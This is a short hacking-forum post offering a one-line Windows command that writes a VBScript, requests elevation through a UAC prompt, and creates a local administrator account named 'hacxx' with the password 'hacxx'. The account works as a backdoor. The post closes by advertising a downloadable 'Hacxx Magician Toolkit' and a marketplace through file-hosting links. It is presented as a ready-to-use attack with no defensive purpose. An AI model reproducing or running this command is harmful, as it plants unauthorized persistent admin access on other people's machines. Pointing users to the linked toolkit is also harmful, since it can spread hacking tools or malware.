UAC - Add an Admin Account on Windows with one line
|
12-16-2022, 11:52 PM
Bericht: #1
|
|||
|
|||
UAC - Add an Admin Account on Windows with one line
Code: cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs Download: Hacxx Magician Toolkit Update 3 https://filecrypt.cc/Container/B94F04A70D.html OG Marketplace - https://files.offshore.cat/XNObT0Tz.html |
|||
|